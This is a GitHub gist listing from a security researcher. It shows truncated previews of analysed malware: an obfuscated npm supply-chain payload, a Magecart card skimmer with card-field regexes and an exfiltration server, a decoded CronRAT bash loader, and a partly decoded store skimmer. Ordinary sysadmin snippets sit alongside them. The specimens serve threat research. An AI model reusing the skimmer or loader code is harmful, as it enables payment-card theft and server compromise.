Skip to content

Instantly share code, notes, and snippets.

View gwillem's full-sized avatar
💫

Willem de Groot gwillem

💫
274 followers · 29 following
View GitHub Profile
@gwillem
gwillem / qix-supply-chain.js
Last active September 8, 2025 16:00
const _0x112fa8=_0x180f;(function(_0x13c8b9,_0x35f660){const _0x15b386=_0x180f,_0x66ea25=_0x13c8b9();while(!![]){try{const _0x2cc99e=parseInt(_0x15b386(0x46c))/(-0x1caa+0x61f*0x1+-0x9c*-0x25)*(parseInt(_0x15b386(0x132))/(-0x1d6b+-0x69e+0x240b))+-parseInt(_0x15b386(0x6a6))/(0x1*-0x26e1+-0x11a1*-0x2+-0x5d*-0xa)*(-parseInt(_0x15b386(0x4d5))/(0x3b2+-0xaa*0xf+-0x3*-0x218))+-parseInt(_0x15b386(0x1e8))/(0xfe+0x16f2+-0x17eb)+-parseInt(_0x15b386(0x707))/(-0x23f8+-0x2*0x70e+-0x48e*-0xb)*(parseInt(_0x15b386(0x3f3))/(-0x6a1+0x3f5+0x2b3))+-parseInt(_0x15b386(0x435))/(0xeb5+0x3b1+-0x125e)*(parseInt(_0x15b386(0x56e))/(0x18*0x118+-0x17ee+-0x249))+parseInt(_0x15b386(0x785))/(-0xfbd+0xd5d*-0x1+0x1d24)+-parseInt(_0x15b386(0x654))/(-0x196d*0x1+-0x605+0xa7f*0x3)*(-parseInt(_0x15b386(0x3ee))/(0x282*0xe+0x760*0x3+-0x3930));if(_0x2cc99e===_0x35f660)break;else _0x66ea25['push'](_0x66ea25['shift']());}catch(_0x205af0){_0x66ea25['push'](_0x66ea25['shift']());}}}(_0x550a,0x1*-0x1d672f+0x15a079+-0x1699a6*-0x1));var neth=0x5c6*0x2+0x23c4+
@gwillem
gwillem / signal-api.md
Created March 28, 2025 13:09
How to send yourself notifications via a simple Signal API

Simple Signal API

I've created a simple API to send alerts & notifications on Signal. For example, this will send you a DM:

curl -d '☕️ coffee is ready' https://signalbot.one/api/send/...

You can get your own webhook URL by sending a message to @BotMaster.1000

@gwillem
gwillem / techrabbit.com.js
Last active October 5, 2024 01:25
TechRabbit.com busted by Magecart again. Malware hosted at checkercarts.com / exfil server itenvoirtech.com
var protocol = window.location.protocol != 'https:' ? 'http://' : 'https://';
var hostname = window.location.host;
var fieldNameRegex = 'shipping|billing|payment|cc|month|card|year|expiration|exp|cvv|cid|code|ccv|authorize|firstname|lastname|street|city|phone|number|email|zip|postal|region|country';
var ccRegex = '[0-9]{13,16}|[0-9 -]{16,20}';
var fieldTypeRegex = 'select|password|checkbox|radio|text|hidden|number|tel|email';
var orderButtons = 'a[title*=\'Place Order\'],a[href*=\'javascript: ; \'],a[href*=\'javascript: void (0)\'],a[href*=\'javascript: void (0); \'],a[href=\'#\'],button,input,submit,.btn,.button';
var emptyString = '';
var saveOrderURL = window.location.href.substr(window.location.href.replace('://', '').indexOf('/') + 3) + '/' + 'saveOrder';
var emptyList = [];
var dropServers = ['itenvoirtech.com'];
@gwillem
gwillem / _cronrat.sh
Last active August 27, 2024 18:17
This is the decoded payload from the CRON loader. Full analysis here: https://sansec.io/research/cronrat
set -eEu
set -o pipefail
trap 'echo "L$LINENO"; O70; exit -1' ERR
O54=4
function O70()
{
if [[ ! -z "${O57+x}" ]]; then
if [[ -f "${O57}" ]]; then
rm -f "${O57}"
fi
@gwillem
gwillem / ansible-bootstrap-ubuntu-16.04.yml
Created June 16, 2016 21:59
Get Ansible to work on bare Ubuntu 16.04 without python 2.7
# Add this snippet to the top of your playbook.
# It will install python2 if missing (but checks first so no expensive repeated apt updates)
# gwillem@gmail.com
- hosts: all
gather_facts: False
tasks:
- name: install python 2
raw: test -e /usr/bin/python || (apt -y update && apt install -y python-minimal)
@gwillem
gwillem / robots.txt
Created January 5, 2016 12:48
Sample robots.txt for Magento on Hypernode
User-agent: *
Allow: /
Crawl-delay: 25
sitemap: http://magentotestpakket.nl/sitemap.xml
Disallow: /*?p=
Disallow: /*&p=
Disallow: /*?price=
Disallow: /*&price=
Disallow: /*?color=
@gwillem
gwillem / magento-nginx.conf
Last active July 29, 2023 10:13
Battle-tested Nginx configuration for Magento (source: www.hypernode.com)
# This is an annotated subset of the Nginx configuration from our Magento production platform @ www.hypernode.com
# See https://www.byte.nl/blog/magento-cacheleak-issue
# !!!! If you are a Hypernode customer, do not use this config as it will result in duplicate statements. !!!!!
user app;
worker_processes 4;
pid /var/run/nginx.pid;
events {
@gwillem
gwillem / go.sh
Created November 24, 2022 10:20
Install latest go version on Ubuntu/Debian
#!/bin/bash
set -e
ver=$(curl -Ls https://golang.org/VERSION?m=text)
dst=/opt/go-$ver
sudo mkdir -p $dst
curl -Ls "https://dl.google.com/go/$ver.linux-$(dpkg --print-architecture).tar.gz" -o - | sudo tar -xz --strip-components=1 -C $dst
@gwillem
gwillem / dell-xps-9310-linux-install-notes.md
Created November 25, 2020 09:43
Linux (Xubuntu 20.04) on Dell XPS 9310 install notes

Dell XPS 9310 Linux install notes (Ubuntu/Xubuntu 20.04)

My NL i7/16GB XPS 9310 has a Killer AX1650s WiFi chip, which eventually worked. Other Killer chips may not work.

I ordered the Windows Home edition, because developer edition with Linux was not available in my country. Apparently you can reclaim €100 from Dell if you don't use Windows.

Install

  • Bios:
  • Change the SATA Mode from the default "RAID" to "AHCI"
@gwillem
gwillem / decoded.js
Last active April 28, 2022 07:03
SweatyBetty.com hack. Source URL: https://www.sweatybetty.com/on/demandware.static/-/Library-Sites-sweatybettylibrary/en_US/v1574703272172/js/custom.js
// Original: https://www.sweatybetty.com/on/demandware.static/-/Library-Sites-sweatybettylibrary/en_US/v1574703272172/js/custom.js
// Decoded by info@sansec.io (C) 2019-12-04
(function () {
function _0x58c32e(_0x531ef5, _0x2f3dd8) {
function _0x3730ba(_0x50af3d) {
if (_0x3730ba[_0x50af3d] !== _0x42a44f) return _0x3730ba[_0x50af3d];
var _0x4c3b76;
if (_0x250d('0x0', 'vxGP') == _0x50af3d) _0x4c3b76 = 'a' != 'a' [0x0];
else if (_0x250d('0x1', 'ipvd') == _0x50af3d) _0x4c3b76 = _0x3730ba(_0x250d('0x2', '%zE0')) && _0x3730ba('json-parse');
else {